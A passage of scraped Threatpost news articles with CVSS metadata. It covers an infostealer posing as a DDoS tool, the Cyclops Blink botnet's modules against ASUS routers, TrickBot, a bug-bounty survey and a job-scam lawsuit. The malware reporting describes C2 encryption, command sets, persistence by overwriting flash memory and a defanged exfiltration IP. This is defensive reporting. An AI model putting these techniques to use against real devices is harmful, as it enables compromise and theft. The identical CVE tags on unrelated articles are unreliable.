cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. 
There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. 
Rather, evidence shows that they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing enforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. 
\u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", "description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper 
attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). Now, to further its goal of widescale infections, ASUS routers are now on the menu, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. 
“Our investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.”

## **A Sinister Purpose?**

Cyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro – the same group that’s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.

“Sandworm was also responsible for…the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),” researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).

Internet routers have been a favorite target for building out botnets for many years, thanks to “infrequency of patching, the lack of security software and the limited visibility of defenders” when it comes to these devices, as Trend Micro put it. More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink’s case, the motives are less obvious.

“The purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,” researchers said. “But what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.”

In fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.

It is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.

“The more routers are compromised, the more sources of powerful data collection — and avenues for further attacks — become available to attackers,” according to the analysis, which raised the specter of “eternal botnets.”

“Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,” researchers warned. “The underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.”

Given Sandworm’s track record, it’s wise to expect the worst, the firm noted.

“Sandworm’s previous high-profile victims and their attacks’ substantial impact on these organizations are particularly worrying — even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,” researchers said.

## **A Few Technical Specifics on a New Botnet Variant**

Coded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.

Once it’s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.

“Communication with the modules is performed via pipes,” according to Trend Micro. “For each hard-coded module, the malware creates two pipes before executing them in their own child processes.”

The malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.

“The data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,” according to the analysis. “The C2 server must have the corresponding RSA private key to decrypt the data.”

Researchers added, “To send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.”

Initially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or at one of its modules, according to the writeup.

If a command targets the core component, it can be one of the following:

 * Terminate the program
 * Bypass the data-sending interval and send data to C2 servers immediately
 * Add a new C2 server to the list in memory
 * Set time to send the next packet to the C2 server
 * Add a new module (an ELF file should be received following the command)
 * Reload the malware
 * Set the local IP address parameter
 * Set a new worker ID
 * Set an unknown byte value
 * Resend configuration to all running modules

As for the commands meant for the modules, the latest variant studied by Trend Micro now includes “Asus (0x38),” meant to activate a brand-new module built to infect ASUS routers.

## **Targeting ASUS Routers**

The ASUS module is built to access and replace a router’s flash memory, thus enslaving it to the botnet, researchers explained.

“This module can read and write from the devices’ flash memory,” they said. “The flash memory is used by these devices to store the operating system, configuration and all files from the file system.”

Cyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.

“As the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,” researchers explained.

A second module, straightforwardly called “system reconnaissance (0x08),” is responsible for gathering various data from the infected device and sending it to the C2 server.

Specifically, it harvests:

 * The Linux version of the device
 * Information about the device’s memory consumption
 * The SSD storage information
 * The content of the following files:
   * /etc/passwd
   * /etc/group
   * /proc/mounts
   * /proc/partitions
 * Information about network interfaces

A third module, “file download (0x0f),” can download files from the internet using DNS over HTTPS (DoH).

Trend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm’s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.

“We have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,” according to the analysis. “Based on our observation, we strongly believe that there are more targeted devices from other vendors. This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.”

## **How to Defend Against Becoming a Botnet Victim**

As with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.

If an organization’s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware’s prodigious persistence capabilities.

“It is best to get a new router,” they explained. “Performing a factory reset might blank out an organization’s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.”

", "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/"}, {"lastseen": "2022-02-26T00:10:25", "description": "

The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers — but it’s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.

A [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a “strange” period of relative inactivity, where “from December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.”

Before the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet – indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group – the operators of the Bazar malware family – whose controllers were found “pushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).”

The report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, “it’s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.”

## **TrickBot’s ‘Turbulent’ Recent History**

TrickBot was originally deployed as a banking trojan, in 2016.
In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. 
As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. 
\u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to 
trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy; and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38 percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. 
Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. 
In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:22", "description": "Riot Games, the developer behind League of Legends, has filed a California lawsuit against scammers, whose identities aren\u2019t yet known, for ripping off job seekers with the 
promise of a gig with the company.\n\nUsually early in their careers and eager for a chance with a gaming company like Riot, job hunters are either targeted by a cybercriminal posing as a recruiter or with fake ads on popular employment sites like Indeed, Riot\u2019s filing explained.\n\nThis email submitted as part of Riot\u2019s lawsuit includes a fake listing for a video game artist/illustrator.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10134745/riot-fraud-email-job-opening-.png>)\n\nSource:\n\nThen, the applicant is run through an imaginary interview process with questions that seem legit, like, \u201cWhy do you want to work at Riot Games?\u201d and, \u201cHonestly describe what kind of working conditions you thrive in.\u201d\n\nThe interview would often be conducted by chat and followed by a quick job offer.\n\nTo make things extra convincing, the fraudsters used contacts and other communications doctored-up with Riot branding, including convincing looking employment contracts.\n\nAfter the interview, there\u2019s just one step left for the interviewee \u2014 they are asked to send money for \u201cwork equipment\u201d like an iPad, which the interviewer assures the new hire will be refunded. Spoiler: they aren\u2019t going to be.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/10135006/riot-text-ask-for-money.png>)\n\nSource: Polygon.\n\nRiot included copies of checks sent to the fraudsters by victims in its complaint, ranging from $2,400 to $4,300.\n\nRiot wasn\u2019t the only prominent gaming company used to lure in victims, Polygon reportedly heard from people approached by fake representatives of Rockstar Games and Manticore Games, according to its report.\n\n\u201c[The scam] is absolutely appalling,\u201d Riot\u2019s lawyers wrote in the complaint. 
\u201cTheir victims largely are young, na\u00efve, and want nothing more than to work for Riot, one of the most prestigious video-game companies in the world. Defendants prey on the hopes and dreams of these individuals in order to steal their identities and pillage their bank accounts.\u201d\n\nRiot Games representatives said in an interview with Polygon that the company isn\u2019t exactly sure how many people have already been [victimized by the phishing campaign](<https://www.polygon.com/22822273/riot-games-job-recruiting-scam-lawsuit>).\n\n## **Gamers and \u2018Dynamite Phishing\u2019**\n\nPhishing lure themes are fickle, and ebb and flow with the latest headlines. COVID-19, [Chipotle offers](<https://threatpost.com/chipotle-serves-up-lures/168279/>), easy [infrastructure legislation money](<https://threatpost.com/attackers-impersonate-dot-phishing-scam/169484/>), and now, dream gaming jobs, are all bait intended to elicit an emotional reaction and make otherwise rational people take action without thinking it through.\n\nLast summer, the Threat Intelligence Team at GreatHorn discovered a rise in business email compromise (BEC) attacks that sent X-rated material to people at work to try and trigger an emotional response, something the report called \u201cdynamite phishing.\u201d\n\n\u201cIt doesn\u2019t always involve explicit material, but the goal is to put the user off balance, frightened \u2013 any excited emotional state \u2013 to decrease the brain\u2019s ability to make rational decisions,\u201d according to the report.\n\nA fantasy job at a huge gaming company could certainly trigger a highly emotional response in the right person.\n\nThis fake gaming company job scam leverages both the so-called [Great Resignation](<https://hbr.org/2021/09/who-is-driving-the-great-resignation>) of 2021, which saw record-breaking numbers of workers looking for better gigs, as well as the [pandemic push to 
work-from-home](<https://threatpost.com/2020-work-for-home-shift-learned/162595/>). Now a call from a personal cell phone number, or a Zoom interview in someone\u2019s kitchen, doesn\u2019t seem all that unusual and fraudsters are taking advantage.\n\nGaming itself is under relentless attack. Last summer, Akamai Technologies found [attacks on gaming](<https://threatpost.com/attackers-gaming-industry/167183/>) web applications alone jumped by a staggering 340 percent in 2020.\n\nFrom [Grinchbots](<https://threatpost.com/pandemic-grinchbots-surge-activity/176898/>) scooping up vast swaths of the latest hardware inventory to last month\u2019s [back-to-back PlayStation 5 breaches](<https://threatpost.com/playstation-5-hacks-same-day/176240/>) and [malicious gaming apps](<https://threatpost.com/9m-androids-malware-games-huawei-appgallery/176581/>) lurking in marketplaces, this latest fake job fraud is just another way criminals are trying to exploit the enthusiasm of gamers.\n\nNow Riot hopes to use this lawsuit as a way to track down the cybercriminals and make it clear the company was not behind the scam, according to Riot attorney Dan Nabel.\n\n\u201cWe\u2019re upset that people who viewed Riot as their dream company, even if that\u2019s one person, had been defrauded through this scam,\u201d Nabel told Polygon. \u201cSecondarily, we felt a need to protect our employees who are having their identities impersonated.\u201d\n\n_**There\u2019s a sea of unstructured data on the internet relating to the latest security threats. **_[**_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
